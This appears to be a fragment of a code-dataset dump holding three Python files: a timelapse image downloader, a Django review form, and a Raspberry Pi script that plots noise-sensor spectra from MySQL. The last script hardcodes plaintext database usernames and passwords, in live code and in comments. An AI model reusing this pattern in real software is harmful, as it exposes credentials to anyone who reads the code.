https://play.google.com/store/apps/details?id=com.pas.webcam&hl=en\r\n\r\n\"\"\"\r\n\r\nimport os\r\nimport urllib.request\r\nimport time\r\n\r\nimageUrl = str(input(\"Image url : \"))\r\ntotalImages = int(input(\"\\nHow many images ? \"))\r\nimageDelay = int(input(\"How many sec between images ? \"))\r\n\r\ndef download_image(url, imageNumber):\r\n outputImage = \"images\\\\\" + \"Image-\" + str(imageNumber) + \".jpg\"\r\n urllib.request.urlretrieve(url, outputImage)\r\n\r\n\r\ndef startTimelapse():\r\n totalRuntime = totalImages * imageDelay / 60\r\n imageNumber = 0\r\n\r\n try:\r\n os.mkdir(\"images\")\r\n print(\"Image folder created\")\r\n except FileExistsError:\r\n pass\r\n\r\n print(\"\\nNow downloading images for timelapse\\n\")\r\n print(\"Fetching : \" + str(totalImages) + \" images with \" + str(imageDelay) + \"sec delay\")\r\n print(\"Total runtime : \" + str(totalRuntime) + \" mins\\n\")\r\n\r\n while imageNumber < totalImages:\r\n download_image(imageUrl, imageNumber)\r\n print(\"downloaded : Image-\" + str(imageNumber))\r\n imageNumber += 1\r\n time.sleep(imageDelay)\r\n\r\n else:\r\n print(\"\\nAll images downloaded !\\n\")\r\n\r\nstartTimelapse()\r\n","sub_path":"tldownload.py","file_name":"tldownload.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"584556490","text":"from django import forms\nfrom decimal import Decimal\n\nfrom ..models import ProductReview, User, Product\n\nimport sys\n\nclass ReviewForm(forms.ModelForm):\n description = forms.CharField(widget=forms.Textarea, max_length=255, required=True)\n rating = forms.ChoiceField(required=True, choices=tuple((x, x) for x in range(6)))\n\n class Meta:\n model = ProductReview\n fields = ('description', 'rating')\n\n def clean_rating(self):\n rating = self.cleaned_data.get('rating')\n print(rating, file=sys.stderr)\n rating = Decimal(f\"{rating}.00\")\n return rating\n \n def __init__(self, *args, **kwargs):\n self._product_id = kwargs.pop('product_id', None)\n self._user_id = kwargs.pop('user_id', None)\n if (self._user_id is not None):\n self._user = User.objects.get(id=self._user_id)\n if (self._product_id is not None):\n self._product = Product.objects.get(id=self._product_id)\n\n super(ReviewForm, self).__init__(*args, **kwargs)\n\n def save(self, commit=True):\n review = super(ReviewForm, self).save(commit=False)\n review.user = self._user\n review.product = self._product\n\n if commit:\n review.save()\n\n return review","sub_path":"web/etsy/etsy_core/forms/reviewForms.py","file_name":"reviewForms.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"234356998","text":"#import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.pyplot\nimport matplotlib.mlab as mlab\nimport mysql.connector\nimport mysql.connector as mariadb\n#libf77blas.so.3: cannot open shared object file: No such file or directory\nimport math\n\ndef converte_dBA(f):\n aux = 0\n f_aux = []\n A_curve= [-30.2, -26.2, -22.5, -19.1, -16.1, -13.4, -10.9, -8.6, -6.6, -4.8, -3.2, -1.9, -0.8,\n 0, 0.6, 1, 1.2, 1.3, 1.2, 1, 0.5, -0.1, -1.1, -2.5]\n f_aux=f+A_curve\n for idx in f_aux:\n aux=aux + (10**(idx/10))\n \n dBA = 10*(np.log10(aux))\n return dBA\n\n\n\ndef main():\n\n x_ticks = (50, 63, 80, 100, 125, 160, 200, 250, 315, 400, 500, 630, 800, 1000, 1250, 1600, 2000, 2500, 3150, 4000,5000, 6300, 8000, 10000)\n\n y_ticks = np.arange(25, 121, 5)\n\n #cnx = mysql.connector.connect(user='pi19', password='unicamp2022',\n # host='192.168.15.52', port = '3306',\n # database='mapa_ruido')\n\n\n #mariadb_connection = mariadb.connect(user=\"pi19\",password=\"unicamp2022\",database=\"mapa_ruido\")\n #cursor=mariadb_connection.cursor()\n\n\n \n #cursor=cnx.cursor()\n\n loop=0\n plt.figure(figsize=(20,10))\n plt.xlabel('Frequencia')\n plt.ylabel('dBSPL')\n plt.title('Resposta em Frequencia')\n #plt.ion()\n \n while (loop==0): \n #plt.ion()\n\n cnx = mysql.connector.connect(user='silvio', password='rasp10203040',\n host='192.168.4.1', port = '3306',\n database='mapa_ruido')\n\n cursor=cnx.cursor()\n\n \n #idx=1\n \n # Grafico \n # Grafico de linha\n cursor.execute(\"SELECT * FROM dados1 ORDER BY medida DESC limit 4\")\n results= cursor.fetchall()\n results=np.array(results)\n\n cursor.execute(\"SELECT * FROM dados2 ORDER BY medida DESC limit 4\")\n results2=cursor.fetchall()\n results2=np.array(results2)\n \n cursor.execute(\"SELECT * FROM dados3 ORDER BY medida DESC limit 4\")\n results3=cursor.fetchall()\n results3=np.array(results3)\n \n cursor.execute(\"SELECT * FROM dados4 ORDER BY medida DESC limit 4\")\n results4=cursor.fetchall()\n results4=np.array(results4)\n r=np.average(results[:,1:25], axis=0)\n r2=np.average(results2[:,1:25], axis=0)\n r3=np.average(results3[:,1:25], axis=0)\n r4=np.average(results4[:,1:25], axis=0)\n \n #cursor.execute(\"SELECT * FROM dados2 ORDER BY medida DESC limit 1\")\n #results_2= cursor.fetchall()\n #results_2=np.array(results_2)\n \n \n plt.plot()\n plt.plot(x_ticks,r , color='b', label= \"Sensor 1, dB(A)\"+str(round(converte_dBA(r),2)))\n plt.plot(x_ticks, r2, color='r', label= \"Sensor 2, dB(A)\"+str(round(converte_dBA(r2),2)))\n plt.plot(x_ticks, r3, color='g', label= \"Sensor 3, dB(A)\"+str(round(converte_dBA(r3),2)))\n plt.plot(x_ticks,r4, color='magenta', label= \"Sensor 4, dB(A)\"+str(round(converte_dBA(r4),2)))\n plt.xscale('log')\n plt.grid(axis='y')\n plt.grid(axis='x')\n plt.xticks(x_ticks, x_ticks, rotation='45')\n plt.yticks(y_ticks)\n plt.legend(fontsize=15)\n plt.xlabel('Frequencia')\n plt.ylabel('dBSPL')\n plt.title('Resposta em Frequencia, Data e Hora: '+str(results[0:1,25:26]))\n #results=[]\n\n \n plt.draw()\n plt.pause(1e-30)\n plt.clf()\n\n cnx.close()\n #loop = input('Digite um numero:')\nif __name__ == \"__main__\":\n try:\n main()\n except KeyboardInterrupt:\n print('Interrompido')\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)\n","sub_path":"Firmware/n_code_rasp.py","file_name":"n_code_rasp.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}